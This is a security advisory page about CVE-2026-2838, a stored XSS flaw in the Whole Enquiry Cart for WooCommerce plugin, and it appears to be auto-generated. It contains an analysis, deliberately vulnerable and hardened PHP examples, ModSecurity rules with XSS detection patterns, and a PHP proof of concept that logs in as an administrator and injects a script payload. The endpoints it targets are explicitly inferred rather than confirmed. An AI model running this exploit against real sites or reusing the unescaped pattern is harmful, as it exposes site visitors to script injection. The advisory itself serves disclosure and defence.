Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 4, 2026

CVE-2026-2838: Whole Enquiry Cart for WooCommerce <= 1.2.1 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'woowhole_success_msg' Parameter (whole-cart-enquiry)

CVE ID: CVE-2026-2838
Severity: Medium (CVSS 4.4)
CWE: CWE-79
Vulnerable Version: 1.2.1
Patched Version:
Disclosed: April 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2838 (metadata-based): This vulnerability allows authenticated attackers with administrator-level access to inject stored cross-site scripting (XSS) via the 'woowhole_success_msg' parameter in the Whole Enquiry Cart for WooCommerce plugin, version 1.2.1 and earlier. The CVSS score of 4.4 indicates medium severity with a vector of AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N, reflecting the high privileges required and the context-dependent nature of the attack.

Root Cause: The CWE-79 classification and the description point to insufficient input sanitization and output escaping on the 'woowhole_success_msg' parameter. The plugin likely saves this parameter to the database from an admin settings page or an AJAX handler without sanitizing it (for instance with wp_kses_post() or sanitize_text_field()), and then outputs it elsewhere (e.g., a success notice or the cart page) without escaping it (for instance with esc_html() or wp_kses()). This is a classic stored-XSS pattern in WordPress admin settings and plugin output hooks. Since no code diff is available, Atomic Edge infers the vulnerable mechanism from the CWE and the parameter name; the parameter most likely stores a customizable success message that the plugin outputs unsanitized.

Exploitation: The issue is only meaningful where the administrator's unfiltered_html capability is disabled (typical on multisite installations or sites with restricted roles), since an administrator who holds that capability may post arbitrary HTML by design. The attacker then sends a POST request to the plugin's admin settings page or AJAX endpoint (likely /wp-admin/admin-ajax.php with an action such as 'woowhole_save_settings', or the plugin's settings page URL) with the 'woowhole_success_msg' parameter containing a JavaScript payload, for example alert('XSS');. The plugin stores this payload in the database. When a user (including lower-privileged users or visitors) accesses the page where the message is displayed (e.g., the enquiry cart page), the script executes in their browser. The attack requires high privileges to store the payload, but execution affects any user viewing the impacted page.

Remediation: The plugin must sanitize the 'woowhole_success_msg' parameter before saving it: wp_kses_post() allows only a safe subset of HTML, while sanitize_text_field() strips all tags. It must also escape the stored value when rendering the message, using esc_html() or wp_kses(), which neutralizes any script that has already reached the database. Both changes are needed: one in the settings save handler and one in the output template or hook where the message is displayed.
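The save-and-render pattern described in the root-cause and remediation paragraphs, as an added example that is not the plugin's code or part of the Atomic Edge analysis: the vulnerable form beside a hardened one. It assumes WordPress is loaded; the option name 'woowhole_success_msg' and AJAX action 'woowhole_save_settings' are the ones the analysis infers (not confirmed against the plugin), and the nonce action 'woowhole_settings' is a hypothetical placeholder.

```php
<?php
// Added example, not the plugin's code. Assumes WordPress is loaded; the option
// name and AJAX action are the ones the analysis infers (not confirmed), and the
// nonce action 'woowhole_settings' is a hypothetical placeholder.

// --- Vulnerable pattern the analysis describes: raw value stored, raw value echoed ---
function woowhole_save_settings_vulnerable() {
    // No nonce, no capability check, no sanitization: any markup is persisted as-is.
    update_option( 'woowhole_success_msg', $_POST['woowhole_success_msg'] );
    wp_send_json_success();
}
function woowhole_render_success_vulnerable() {
    // Stored markup, including <script>, is emitted unescaped to every viewer.
    echo '<div class="woowhole-notice">' . get_option( 'woowhole_success_msg' ) . '</div>';
}

// --- Hardened pattern: validate the request, sanitize on save, escape on output ---
function woowhole_save_settings_hardened() {
    // Reject requests without a valid nonce (stops CSRF) or from non-administrators.
    check_ajax_referer( 'woowhole_settings', '_wpnonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $raw = isset( $_POST['woowhole_success_msg'] )
        ? wp_unslash( $_POST['woowhole_success_msg'] ) : '';
    // wp_kses_post() keeps only the tags and attributes WordPress allows in post
    // content; <script>, on* event handlers and javascript: URLs are stripped.
    // Use sanitize_text_field() instead if the message never needs any markup.
    $clean = wp_kses_post( $raw );
    update_option( 'woowhole_success_msg', $clean );
    wp_send_json_success( array( 'saved' => $clean ) );
}
function woowhole_render_success_hardened() {
    // Escape at output too: the stored value may predate the fix or come from
    // another write path, so the database is never treated as trusted.
    $msg = get_option( 'woowhole_success_msg', '' );
    echo '<div class="woowhole-notice">' . wp_kses_post( $msg ) . '</div>';
}
// Register the hardened handler for logged-in AJAX requests only (no wp_ajax_nopriv_ hook).
add_action( 'wp_ajax_woowhole_save_settings', 'woowhole_save_settings_hardened' );
```

The settings form must emit wp_nonce_field( 'woowhole_settings', '_wpnonce' ) so the hardened handler accepts its submissions; a request lacking that field is rejected before anything is written.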

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user visiting the page that displays the stored message. This can lead to session theft, credential harvesting, defacement, or redirection of users to malicious sites. Although the CVSS score is moderate (4.4) owing to the high privilege requirement and complex attack conditions, the stored nature of the XSS means the impact persists until the malicious input is removed.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-2838 (metadata-based)
# Blocks stored XSS in the woowhole_success_msg parameter for the Whole Enquiry Cart for WooCommerce plugin.
# Targets the likely AJAX action and the plugin settings page POST requests.
# Both endpoints are inferred from the CVE metadata; confirm them against the plugin before deploying.
# A trailing backslash continues a directive onto the next line.

# Rule 1: Block XSS payload in AJAX request to woowhole_save_settings
# REQUEST_FILENAME carries no query string and also matches sub-directory installs.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:20262838,phase:2,deny,status:403,log,chain,msg:'CVE-2026-2838 - XSS via woowhole_success_msg in AJAX',severity:'CRITICAL',tag:'CVE-2026-2838'"
  SecRule ARGS_POST:action "@streq woowhole_save_settings" "chain"
    SecRule ARGS_POST:woowhole_success_msg "@rx <script|<img.*onerror|<svg.*onload|<iframe|onmouseover|onclick|javascript:" \
      "t:none,t:urlDecode,t:lowercase"

# Rule 2: Block XSS payload in direct POST to plugin settings page (inferred slug: woowhole-settings)
# The page is identified by its query argument rather than by a regex over REQUEST_URI,
# so "?" and "." in the path need no escaping.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin.php" \
  "id:20262839,phase:2,deny,status:403,log,chain,msg:'CVE-2026-2838 - XSS via woowhole_success_msg in settings page',severity:'CRITICAL',tag:'CVE-2026-2838'"
  SecRule ARGS_GET:page "@streq woowhole-settings" "chain"
    SecRule ARGS_POST:woowhole_success_msg "@rx <script|<img.*onerror|<svg.*onload|<iframe|onmouseover|onclick|javascript:" \
      "t:none,t:urlDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2838 - Whole Enquiry Cart for WooCommerce <= 1.2.1 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'woowhole_success_msg' Parameter

// Configuration: Set these variables before running the script.
$target_url = 'http://example.com'; // Change to the WordPress target URL
$admin_username = 'admin';          // Administrator username
$admin_password = 'password';       // Administrator password

// Step 1: Authenticate as administrator
$login_url = $target_url . '/wp-login.php';
$login_post_data = array(
    'log' => $admin_username,
    'pwd' => $admin_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_post_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Check if login succeeded (basic check: look for dashboard text)
if (strpos($response, 'wp-admin') === false && strpos($response, 'dashboard') === false) {
    die('[!] Login failed. Check credentials or target URL.');
}

echo "[+] Login successful.\n";

// Step 2: Inject XSS payload via the woowhole_success_msg parameter
// The parameter is likely saved via an AJAX action (e.g., 'woowhole_save_settings') or via a POST to the plugin's settings page.
// We test both common patterns.

// XSS payload: simple JavaScript alert to demonstrate execution
$xss_payload = '<script>alert("CVE-2026-2838 XSS");</script>';

// Attempt 1: AJAX endpoint (common for plugin settings)
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_post_data = array(
    'action' => 'woowhole_save_settings', // Inferred plugin AJAX action
    'woowhole_success_msg' => $xss_payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo '[+] AJAX response code: ' . $http_code . "\n";
if (strpos($ajax_response, 'success') !== false || $http_code == 200) {
    echo "[+] Payload likely saved via AJAX. Check the page where the success message is displayed.\n";
} else {
    // Attempt 2: Direct POST to plugin settings page (if AJAX fails)
    $settings_url = $target_url . '/wp-admin/admin.php?page=woowhole-settings'; // Inferred plugin page slug
    $settings_post_data = array(
        'woowhole_success_msg' => $xss_payload,
        'submit_settings' => 'Save'  // Common submit button name
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $settings_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($settings_post_data));
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $settings_response = curl_exec($ch);
    $http_code2 = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    echo '[+] Settings page response code: ' . $http_code2 . "\n";
    if (strpos($settings_response, 'settings saved') !== false || $http_code2 == 200) {
        echo "[+] Payload likely saved via settings page. Check the page where the success message is displayed.\n";
    } else {
        echo "[!] Could not confirm payload injection. The plugin endpoint may differ.\n";
    }
}
